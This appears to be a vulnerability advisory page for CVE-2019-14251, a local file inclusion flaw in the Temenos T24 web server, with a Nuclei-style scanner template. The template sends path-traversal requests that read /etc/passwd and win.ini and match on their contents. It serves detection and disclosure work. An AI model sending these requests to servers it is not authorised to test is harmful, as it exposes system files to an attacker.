CVE-2019-14251: T24 Web Server - Local File Inclusion

2025-08-01 T24 Web Server PoC Public

Description

T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.

PoC

id: CVE-2019-14251

info:
  name: T24 Web Server - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the T24 Web Server.
  reference:
    - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt
    - https://vuldb.com/?id.146815
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14251
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-14251
    cwe-id: CWE-22
    epss-score: 0.07849
    epss-percentile: 0.9438
    cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: temenos
    product: t24
  tags: cve,cve2019,temenos,lfi,unauth,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd"
      - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "for 16-bit app support"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100915346d1abf3617810b16e207d68e4afa99608016f394ce48ec7b4ff15b8b1e0022054946072f109ea0add163aa4c31292e3605be41adeab001b68aafdaf9042a8b1:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities